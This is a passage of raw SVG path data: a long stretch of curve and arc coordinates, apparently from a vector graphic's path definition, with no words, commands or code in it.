1.3-.3-1,.3,4.5.9,6.2.7-1.2-.2,3.8.3,3.9-.2a21,21,0,0,1,4.8.8c-2.5.1-2.6-.1-7.1-.2-.4.4-.5.3.7.8,1.9.3,5.1-.1,7.2.3a40.53,40.53,0,0,0-6.4.6c9.2.7,4.1,1.5,4.8,2.3-3.3-.1-9.6,0-5.3.2,1.8-.1,4.6-.2,8.2-.1-2.1.3-4.3.4-.6.9-7.5-.2.5.6-5,.7,2.1.1,7.2,0,7.2.3l.2.2c-5.1-.1-7-.4-11.5-.5-1.7.4,6.4.2,4.6.5,4.1.2,3.5-.1,7,0-1,.5,4.6,1.1-1.5,1.5,5.6.2,3,.5,4.8.8-.9.2-7-.2-5.4.2,2.7,0,3.2.2,5.8.2.1-.1.2-.3,2.7-.2,10.2.6,3.7,1.5,3.2,2-.1.1,7.4,1.2-2.3.6,1.7.3,2.9.8-3.7.6.6-.2,3.2-.2,2.3-.6-4.2-.1-5.1-.4-8.8-.5,1.5.5-4-.3-2.5.3.8.4,7-.1,8.6.3a17.63,17.63,0,0,1-3.9.4c-1.46-.17-2.93-.27-4.4-.3-.6.2-3.2.7-.6.9,2.4,0-.6-.5,2.3-.5,2.7,0,11.7.5,2.9.2-.1.4,8.2.3,6.3.8-2.4,0-3.8-.2-4.3-.1.2.4,3.7,0,6,.5a51.1,51.1,0,0,1-5.4.2c4.4.5-2.2,1.3,6.4.9a3.92,3.92,0,0,1-2.3.5c-1.5-.4-2.2-.2-5.8-.2,1.4.6-.8.9-1.6,1.4,3.3.2,5.1-.2,5.7.1-3.6-.1,2.1.2.4.4-2.1,0-5.3-.2-5.6,0,.5.5,3.4,1.1-1.9,1-.9-.2,1.2-.5-1.9-.6-3.9.3,4.3.8,1,1.1,1.9,0,3.8.1,5.7.1,0,.4,5.7,1-3.5.8,2.7-.4-5.2-1-10.5-.9.1.3,1.4.7-.6.9,2.1.3,4.1-.1,5.8.2-2.1.3,6.3,1.5,3.1,1.9,2.8,0,.7-.5,5.2-.4,5.3.9-3.4,1.6-.9,2.2a37.63,37.63,0,0,1,3.8-.5c2.3.6-2,.9-1.3,1.7.1.1,2.6.2,3,.3-.1.5-7,.9-11.7.9,9.5.3,8.4-.3,12.1-.5,3.8.6-3.6.6,1.1,1.2,2.2,0-.8-.6,3.9-.3-3-1-7.2-2,.6-2.5-2.3.7,1.1.3,4.8.8-.2.3-5.2.7-3.4.9a11.09,11.09,0,0,1,2.7,0c3.5.4-2.9.9.8.9-.2-.2.8-.3,2.5-.3,3.9,1.1-2.2,1.4,4.7,2.2-9.4-.1,2.3,1.7-6.9,1.6-1-1.1.2-1.6-2.1-2.4-3.4.1-2.8-.4-4.7-.7-6.5.4,2.1,1.5,4.6,2.1-1.8,0-1.8.1-4.1,0,.6-.4-2.9-.5-2.2-.9-2.4,0-7.6-.2-6.8.2,2.7.1,3-.1,5.6,0a7.57,7.57,0,0,0,.8.9c-9.5,0-9.1-.2-18.5-.5,0-.1,1.7-.1,1.1-.3-10.1-.2-11.8-.9-16.5-1.4-3.8.3,5.7.5,3.7,1.1a21.29,21.29,0,0,0-4.3-.1c4.4,0,1,.6,6.1.6-.4-.3.3-.4,2.3-.5.2.1,2.6.2,3,.3,1.5.4-1.9.3-2.4.5,1.1.1,2.8.1,2.9.2,5.7.2-1.9-.4,5.4-.2,9.1.7,19.7.5,16.6,1.5-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.8,1-2.8,1.5-3,2.9,3.4.2,5.1-.2,5.7.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7-.4.3-4.2.2-6.7.3,2,.2,5.3.2,7.3.4.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a44.62,44.62,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2A60.14,60.14,0,0,1,434,68.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.52,31.52,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0h0c3.1,1.1,11.5,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4h-1.3c-4.1-.1-5.1-.3-4.9-.7a17.46,17.46,0,0,0,5-.3c1.4-.4,1.6-.8,8.3-.4-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-5.5-.6-3.8-2-7.2-3a23.68,23.68,0,0,0-2.9-.6h3a16,16,0,0,0,2.5-.1,15,15,0,0,1-2.4-.2c-1.6-.2-2.7-.3-5.1-.4,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.91,97.91,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.8-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.15,66.15,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7q1.65.3,4.2.6c1,.1,2.1.2,3.5.3,5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1a24.24,24.24,0,0,1-3.2.3c-2.1.1-3.8.2-1.6.6-.9-.2.2-.2,1.5-.1,1.1.1,2.4.2,2.8.2a5.67,5.67,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.52,31.52,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a27.09,27.09,0,0,1-3.1-.3,17.94,17.94,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.09,41.09,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.06,9.06,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.82,31.82,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a4,4,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.81.2,1.91.3.41.4,11.19.3.19-1.1,0-1.6s10.4,0,9.09-.7a35.68,35.68,0,0,0-4,.1c-2.19-.5-5.59-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.19-.3-6.19-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.59,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-3.7-1.5,5.5-1.6-7.2-1.3-3.3-3.2,2.1-3.9a14.11,14.11,0,0,0,2.9.2c-.4-.3-1.3-.5-3.4-.7-.1.1-.2.3-2.6.2-.7-.8,1.2-.9.1-1.4,2.1.1,3.7.2,5.9.4-2.5-.7,4.1-.6,1.6-1.3-3.9,0-3.7.3-7.1-.2a27.6,27.6,0,0,0,5.3-.3c-2.3-.3-5.8.1-7.3-.4.4-.7-1.2-.7-2.7-1.5,5.6.2,4.7-.5,9.6-.1.3-.7,3.6-.7-2.5-1.3,4.4.3,5.4-.1,10,.3.1-.2-1.8-.3-1.8-.5-3.1,0-7.5.1-8.6-.3,2-1.1,6.3-2.5-1.7-3.5,2.5,0,4.4.1,5.8.2-.2-.2-.3-.4-.5-.6-3.6,0-5.2-.2-4.6-.4,6.1.4,2.5-.2,8.31,0,4.09.6-1.5.9-2.91,1.5,7.9.4,6.31,1.6,2.5,1.9,7.9-.3,6.81-1.8,4-2.4,3.2-.6,7.5-1.1,8.1-1.9a20,20,0,0,1-4.5-.4c-4.4-.2-4,.1-8.4-.1-1.7.4,4.1.3,3.3.6-6.9-.3-3.09.4-9.59.1.8-.5,6.4-1.1-1.31-1.4-.19-.2-.3-.4-.5-.6,1.9.2,5.31.2,7.31.4.19-.6-7.5-.1-7.6-.7,2.3-.2,5.69-.1,1-.4,4.5-.2,7.8.4,9.9.2-2.4-.1-3-.8-.7-.8a28.18,28.18,0,0,1,5.8.3c-7.3-.3,1.2.7.9,1-2,.1-5.7,0-6.8.2,6.9.2,1.1.6.7.8,9.1.1,6.7-.6,7.6-.8,4.4.1,1.3.4,6.19.7-1.59-.5-5.9-1,.41-1.1-3.7-.1.69-.7-6.2-.7-1.7.3,4.4.7.6.7-6.7-.6.3-.7,1.8-1-4.7-.2-.8.3-5.5.1-.1-.1-1.3-.2-1.6-.3-.9-.6,2.2-.6,6.1-1-1.1-.3-2.1.1-4.2,0-.1-.2-.9-.3-1.7-.4a29.51,29.51,0,0,1,5.4-.2c3.7.1,1.5.5,6,.5-1.5-.5-2-.6.6-.9-1.5-.3-6.2-.3-6.1-.7.2-.2,3.6-.1,3.8-.3-2.2-.2-4.4-.9-1.2-1.3-2.9-.2-4-.5-6.2-.7-1,.5,2.5.8-2,.9-.8-.1-1.7-.3-3.1-.4,0,.3,2.5.4,3.3.6-8.8-.3-.5.7-3.6.7-1.9-.1-2.8-.2-5.8-.2,4.2.7,6.8,1.7-1.1,1.9,8.3.1,2.8,1.2-3.7.6.5.6,4.2.3,6.2.7-2.6,0-3.3.2-6.9.1-8.2-1.2-2.7-1.7,3.4-2.4-4.5-.8-1.7-1-4.1-1.5,1.4,0,2.8.1,4.3.1-3.9-.2-2.3-1.3-6.5-1,3.7.3,1.7,1-1.9.9-1.6-.7,1.5-1-.1-1.7a29,29,0,0,0,6.9-.1c-8.3-.2-6.2-.8-1.9-.6-1.9-1,3.8-1.9-1.4-3.2,5.4-.1,5.3-.7,1.7-1.2a41.25,41.25,0,0,1,4.3.2c-1.9-.5,1.1-.5,3.7-.6-4.2-.5-4.8.3-7,0a13.65,13.65,0,0,1,5-.7c-.1-.8-5.1-2.5.1-3.1-5-.8-7.6-4.5,1.6-2.9.7-.7-2-1.7-2-2.2,1,.6.7-.2,5.7.1-1.5-.4-2.1-.4.9-.5-6.7-.2,1.7-.7-3.7-1.1.1.1-1,.1-1.4,0h8.3c3.9.4,1.1.4,3.5.8,4.8-.1,4.7.2,8.7.4-3.4-1.5-1.3-1.2.7-2.4-5.2-.2-1.3.5-5.2.4-.2-.2-.3-.4-.5-.6-2.6,0-4.7,0-5.5.1,5.2.1-.6.3,4.6.5-1.1.1-.7.4-5.4.2-.5-.2.9-.5-3.2-.5,1.3.3,2.5.6-.8.6-5.4-.7.6-2-5.4-3,4.6-.2,5.6-2.2-2-2.3,3.1-.2,2.2-.1,6.8-.2,1.8.4-2.1,1.1,3.9,1.3-1.4-.5-3.7-1.3,3.6-.7,0-.3-4.5-.4-4.7-.7,1.9,0,3.8.1,5.7.1.1.2.2,1.1,3.4.7-4.1-.3-.4-.7.6-.9-3-.3-4.9-1.5,2.9-1.5,1.6.1,2.3.2,3,.3-.1.4-3.7.8.9,1a58,58,0,0,1-7.1-.2c-.1.5,4.3.2,6,.5-2.8.1-5.6.2-.9.5,4.3-.2,7.2-2,1.7-2.8,5.5-.3-5.2-1.9,9.6-1.7-1.6-.3-1.3-.9,3.4-.9.7-.3-4.1-.3-3.3-.6,2.6-.6,8.2-.3,16.3-.4-7.9-.2-7.2-1-3.9-1.3a21.78,21.78,0,0,1,3,.3c4.5-.3-7.8-.8-.8-.9,4.4-.1,2.5.7,4.4.3-3.6-.5,4.1-.4-2.1-.8.7-.2,4.1-.1,5.4-.2-5.9-.4-6.3-2.4,3.9-1.9-6.5-2.2,6.1-4.8,5.3-6.6,2.7.1,6.1.2,6,.5-1.9,0-6.3,0-1,.4-.4-.2,1.2-.2,4-.1,2,.4-3.7.6.8.9.3-.3,1.7-1,1.7-1.3-1.5-.1-6.6-.2-8.8-.5,10.4.4.7-.4,5.1-.5,2.3.4,8.5.3,5.6,0,.1.3-4.7-.1-4.4-.2,1.2-.4,14.8-.2,9.1-.7-3.4-.1,1.2.5-4,.2-5.8-.3.3-.7.5-1-8.6-.4-11.4-1-9.7-1.5.7.5,2.7.3,7.3.4-.1-.7-2.1-1.2,2.7-1.7.5.2,0,1.1,2.1.8-2.1-.6,3.6-.5,6.8-.2-3.1-.6,2.5-.5-2.3-1,1.8,0,1.8-.1,4.2,0s3.4.3,3.2.5c5.9-.2,6.5-.3,10.6-.6-3.7-.2-4,.3-5.6,0,1.2-.4-3.4-.5-3.5-.8,6.7.2,3.8-.5,6.4-.6,6.4.6-4.8.8,2.5,1.3-.3-.3,1.6-.6,6.6-.4,1.1.3-1.1.8,2.19.9,2.2-.5-.69-1,8.9-.9-6.3-.3-.4-.9-5.4-1.4,2.7-.1,2.81.1,5.6,0-2.69-.4,4.8-.3.9-.5.1.3-4.69-.1-4.4-.2,3.6.1,2.5-.3,2.31-.6,4.4.2,4-.1,8.4.1-5.1-1.2,5.4-1.7,3.09-2.8,2,0,7.4.3,7,0-4.3-.3-5.8-.7-3.59-1a21.48,21.48,0,0,1,3,.3c2.91-.4-1.4-2.1,8.6-1.3-4.5-.5-8-1.6.2-1.3-1.3-.4-6.5-.2-7.3-.4,11.4-.8,2.1-2.3,8.8-3.2,6.2,1,4.4.1,5.3-.1-1.7-.3-2.3-.6-3.6-.9,0-.1-.4-.2-1.8-.4-.3-.1-.7-.1-1.1-.2.2,0,.4.1.6.1-.4,0-.7-.1-1.2-.1a31.52,31.52,0,0,1,4-.2l1.2.3a1.25,1.25,0,0,1-.6-.1c0,.3.1.6,2.4,1-.19-.2-.1-.2.1-.3a3.88,3.88,0,0,1,1.6,1,4.91,4.91,0,0,1-.5-.1c.2,0,.3.1.5.1a.79.79,0,0,1,.2.7h0c0,.1-.1.3-.1.4a5.54,5.54,0,0,0-1-.2c-3.2-.2.1.8-2.5.8a24.16,24.16,0,0,1,4.3.9c-3.1-.5-4-.2-1.8.4-2.1-.1-3.4-.7-5.2-.8,2.8.5,2.5,1.1,3.5,1.2,0-.1.2-.2,2,.1,2.1.5-.7.2.3.7,3.91.7,1.6-.2,3.91.1-.81.5,3.19.6,3.19.6,4.1,1-1.4.4-3.9,0,4.1.6,7.5,1.6,8.3,1.3-4.4-.9,1.7-.1-2.5-1.2a21.08,21.08,0,0,0,4.1.5c-2.2-.6-4.4-.5-5.4-1.1,1.4-.7,10.6,1.5,9.7,2.1,2.1.1,1.4,0,.7-.5,3.6,1,2.4.2,4,.3,1.3.4,1.1.6,1.3.9a5.08,5.08,0,0,1-.8.3,3.07,3.07,0,0,0-1-.2c.5.3.3.4,0,.5-.5.1-1.1.3-1.7.4,1.3.7,1.6,1.4,1.7,2-.2,0-.4-.1-.6-.1,1.5-.3-1.3,0-5.2-.9.3.2-.2.4,1.3.7.1-.7,2.5,1,4.2.8-2-.4-1.1-.4.4-.3a1.52,1.52,0,0,0,.1.6c-1.2,0-2.8-.1-3.1.2,1.5.3,2.6.5,3.3.7a3,3,0,0,0,.4.7h-1.09a10.53,10.53,0,0,0,1.4.3,5,5,0,0,0,1.1.7c-.7,0-2.91-.4-3.1-.3,4,.8-.1.4,3.4,1.1a19.63,19.63,0,0,0-2-.2,13.53,13.53,0,0,0-2.3-.7c-.91,0-1.1,0-.91.1-3.8.7,8.1,2.3-3.09,2.4a5.23,5.23,0,0,0-1.31-.1c-2.1-.4-1.69-.7-4.69-1.2a11.09,11.09,0,0,0,3.5,1.2c-.1-.2,1.8.2,2,.1a4,4,0,0,1-.5-.1c6.4.4,2,.5.5.9,3.9.2,6,.5,1.9.6,9.5.6,1.8-.5,3.19-1.1a9,9,0,0,0,3.1,0c.2.1.5.2.9.4.7-.1,4,1,5.5,1.4,1.1-.4-6.5-2.1-.69-1.6a12.16,12.16,0,0,0,4.3.9c-1.3-.4-2.8-.8-4.4-1.2-.9-.6,1.5-.4,2.69-.4-1.59-.3-3.8-.6-4.3-.8h.4c1.31.3,2.81.6,4.7,1,.8,1.5,4.6,3.6,1.8,5.2,10.7-.4-2.6-2.5,7-3.1,1.9.1,4.1.2,6.1.2.5.2.3.3,3.1.6-2.1-.1.4.5,1.3.9,1.5-.4,1.6-1,1.5-1.6a87.43,87.43,0,0,1,12.3-.9c-2.4-1.2,3.31-2.2,10.5-2.8-.8.3-1.8.5-.2,1-.09-.1.31-.2,1,.1.31.4-5.19-.7-5-.3,2.5.5,4.31.3,5.2.8-3.5-.3.1.2,1.3.7-2.19-.2-1.69.3-3.9-.1,7.5,2.1-1.3,1.5.2,2.5-3.9-.6-3.8-.2-4.9,0,3.9.7,1.7-.3,5,.3-1.4.8,3.8,3.1,7,4.6-2.8-.4-2.2-.6-4.3-.9-.6.3,4.1.9,4.5,1.3-4.3-.2-10.3-.5-3.3,1.2.1-.2-.6-.5.8-.3.1.3,5.7,2.1.8,1.7a39.85,39.85,0,0,1-4.4-1.1c1.4.2,1.8.1,1.9-.1-3.3-.5-2.9-.8-5.4-1.2-1.3.2,3,.7,2.4,1-2.9-.5-2.2-.6-4.2-.7,2.4.6,3.1,1.4,5.6,1.6-4.5-.5,2.4,1.6-2.4,1.2-2.7-.5,2.5-.2-2.4-.9-.6.1-.4.5.5,1,4.6.9-1-.4,2,.1,4.6.7,3.8,1.7,6.7,1.9-4.4-1.4.2-1.5-4-2.3,2.8.2,3.2-.2,6.9.3,0,.4.5.4,1.6,1.3-3.1-.4-10.1-.8-1.6.6-1-.6.7-.4,2.9-.1-2.3,0,3.5,1.1.4,1,4.6.7.8-.8-.6-1.2,1.3.2,1.5.4,3.2.6-2.5-1.8.9-2.1,4.6-2.7-5.4-.9-3.1.2-8-.6a8,8,0,0,0-1.2-.4c3.3.5,3.4.2,2.8-.3,3.6.6,4.4.5,6.1.7-7.1-1.7-3-2-1.1-2.3a20.39,20.39,0,0,1,2.2.6c1.2-.5.7-1-2.7-1.7,2.2.4-2.7-1.1.6-.7.7.2,3.4,1,4.2.8-3.2-.7-3.4-1.3-3.8-1.8a25,25,0,0,0,5.1.5c-1.8-.6-4.8-.6-6.4-1.2,4.1.4.3-.9,5.6-.4q-4.05-.6-3.3-.9c1.2.2,7,1.4,4.2.7-3.8-.5-3-1.3-.4-.8-.3.8,6.2,1.4,7.9,2.4a16.72,16.72,0,0,0-2-.2c-2.1-.3-1.5-.6-4.3-.9-.3.5-2.9,0,.4,1a25.83,25.83,0,0,1-5.1-.6c-.2.4,5.2,1.1,5.5,1.5s-1.6.1-.7.5c-1.1-.2-2.1-.4-3.1-.5,2.3,1-.2.2,3.5,1.4-1.2.2-4.2-.2-7.1-.6.8.4,5.8.9,6.4,1.3,0,.6,2.2,1.3-.4,1.3-1.7-.3-.7-.4-2.3-.7.1.2.2.3.2.5,3.4.6,3.1.3,5.3.9-3.4-1.8,2.9-1.7-1.6-3.5a45.32,45.32,0,0,1,5.2.8c-1-.7-1.8-1.3-3.3-.9a20.16,20.16,0,0,0-2.3-.8c4.6.8,5,.2,1.8-.3,3.7.6-2.4-.8.9-.2,3.3.4,2.8,1,4.6,1.7,2.9.1-1-1.3-1.9-2,4.7,1.2-.3-.9,2.7-.4,1.8.3,2.5,1.1,4.4,1.1-3.4-1-1.8-1.3-7-2.5,6.9.5-7.2-3.1,1.7-2.5-3.3-.7-1.8-1-.5-1.1,2.4.4-.2.6,4.4,1.2-.5-.5-2.1-1-4.6-1.5.2-.2,2.7.2,2.9,0-1.9-.3-3.9-1.2-2.4-1,1.2.2,1.2.4,1.2.5a10.4,10.4,0,0,0,4,.3c-1.6-.3-3.9-.6-4.3-.8a47.94,47.94,0,0,0,9.8.2c-5.3-.9,1.7-.4-4.5-1.3-.1.4,3.1,1.5-.8.4-2.4-.1,1.8,1-.6.8a15.24,15.24,0,0,1-2.1-.4c-.8-.7,5.2-.1,1.3-1.3-.1.1.3.4-.9.2a8,8,0,0,0-1.2-.4c.3-.2,4,.6,2.9,0-5.6-.6.1-1.1-7.9-2.4,3.8.4-.8-.3-.3-.7a19.35,19.35,0,0,0,2,.2c1.9.3,3.8,1.2,5.4,1.1-2.6-.5.1-.7-3.5-1.2.9.3-1.8.2-2-.1-1.3-.6,6.1.5,1.7-.6a5.55,5.55,0,0,1-2.1-.2c3.1,0,.8-.8,1.4-1.2a16.44,16.44,0,0,0,4.6,1.7c-1-.7.2-.7,2.7-.4-3.7-.7-5.3-.6-6.3-1.2,3.1.5.9-.5,3.9,0-3.6-.4-5.6-1.3-6.4-1.2,3.8,1-2.6-.4-2-.1,1.7.2,2,.9.3.6.3-.2-2.5-1.2-3.4-1.1,2.6.4.4.4-.9.2a4.69,4.69,0,0,1-.6-.2l1.2-.6a13.09,13.09,0,0,0,3.9.1c-1.6-.3-2.6-.4-3.4-.5.3-.2.5-.4.4-.7a11.17,11.17,0,0,0,2.7.8c-1.4-.8-2.1-1.9,1.1-1.7,1.4.9.6.9-1.4,1.1,5.7.9,6.9,1.3,12.8,2.5.6-.3-3.3-1.3-3.5-1.2-1.2.1,4.3,1.1,1.3.7-3-.6-4.9-1-5.5-1.5,3.4.3.5-.4,1.7-.6,4.2.9,2,0,4,.3,2.1.6.2.3.3.6,6.5,1-.1-.5-.4-.8,1.8.3,3.3.6,4.2.8a5.7,5.7,0,0,0-2.3-.8c-1.2.3-9.2-1.6-7.7-1.9a26.05,26.05,0,0,1,5.2.8c.1-.2-1.3-.5-1.3-.7,3.8.7,2.6,0,6.1.6-1.4-.7-.2-.6-3.5-1.2-3-.4-.1.4-1.9.1-1.6-.3-4-1.2-1.4-.9,3.4.6,5.6,1.2,6.2.8-5.4-.6-.8-.3-3.3-.9a41.57,41.57,0,0,1-7.2-.9c-.7-.8,1.5-.6,1.5-1,1.3.5,1.1.9,3.6,1.5,3.7.1-2.3-1.7,2.3-1.3-2.6.1,2.7.9,4.6,1.5,1.3-.1,3.3.7,4.1.6a16.33,16.33,0,0,1-4.4-1.1c3.3.5,4.5.1,7.1.7-1.6-.8-6.3-2.3.2-1.8,1.1.4-3-.1.2.5,0-.1.8,0,1.1.2.5.4-4.8-.9-3-.2,5.3,1,4.4,1.7,7,2.6-2.9-.6-1.9-.1-3-.2a11.42,11.42,0,0,1,3.1.8,3.7,3.7,0,0,0,1.1.1,5.44,5.44,0,0,1-1.1-.3c-.4-.1-.3-.1,0-.1.7,0,2.4.2,1.9,0a6.07,6.07,0,0,1-1.9-.5c-.3-.1-.2-.2,0-.3s1-.3,0-.7a4.76,4.76,0,0,0-.9-.3,3,3,0,0,1,.9.2,18.66,18.66,0,0,1,3.4.7c-.3,0-2.4,0,.2.5.2-.2,1.5-.2.7-.7-1.9-.3-2.5-.5-2.3-.7-.8-.1-1.4-.2-2-.3a14.26,14.26,0,0,1-3.4-.8c1.6.2,2.6.5,3.4.6s1.4.3,1.8.1c-.6-.1-1.2-.3-1.8-.4-3.5-.8-6.3-1.5-9.1-2.2,3.4.7,2.5.2,4.1.5a2.76,2.76,0,0,0,1.2.4c-1.3-.7,2.9.6,3.9.5h0c-6.8-1.3-1.7-.7-6.5-1.9,3.4.7,2.2.5,4.2.6.